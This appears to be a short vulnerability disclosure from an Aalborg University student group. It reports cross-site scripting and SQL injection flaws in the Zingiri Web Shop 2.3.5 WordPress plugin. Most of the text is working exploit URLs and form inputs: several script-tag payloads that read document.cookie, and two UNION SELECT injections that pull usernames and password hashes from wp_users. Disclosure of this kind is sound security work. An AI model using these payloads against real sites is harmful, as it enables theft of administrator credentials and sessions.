WordPress Zingiri Web Shop plugin version 2.3.5 suffers from a cross site scripting vulnerability.
86c31441cda27e28c5b3ca32dea2f36dc316fbfebaadb6e3c217fc15c5fb64de
Hi
We have used our tool, THAPS, to identify vulnerabilities in this WordPress plugin.
We have confirmed at least one of the reported vulnerabilities and created a working exploit located below.
Attached is one or more log files containing the output of our tool, identifying the location of the vulnerabilities which might help the developers locate the issue.
Module: Zingiri Web Shop
Version: 2.3.5
Confirmed exploits:
Exploit:
http://wp.bacon/wp-content/plugins/zingiri-web-shop/connect.php?file=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Exploit:
http://wp.bacon/wp-admin/admin.php?page=customer&zfaces=form&form=profile&action=edit&id=1
POST data: lastname="><script>alert(document.cookie);</script>
Exploit:
http://wp.bacon/wp-admin/admin.php?page=orderadmin&action=showstatus&orderid=1 and 1=0 union select 1,2,3,4,5,6,7,user_pass,9,10,11,12,13,14,15,16 FROM wp_users WHERE ID=1
# XSS Exploit:
http://wp.bacon/wp-admin/admin.php?page=orderadmin&action=showstatus&orderid="><script>alert(document.cookie);</script>
Exploit:
Products -> Stock management:
Stock amount content: "><script>alert(document.cookie);</script>
# SQL Exploit:
Products -> Stock management:
Stock amount content: 0 UNION SELECT 1,user_login,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 FROM wp_users WHERE ID=1;--
Best Regards
Heine Pedersen and Torben Jensen
Student project group: sw101f12
Aalborg University
Denmark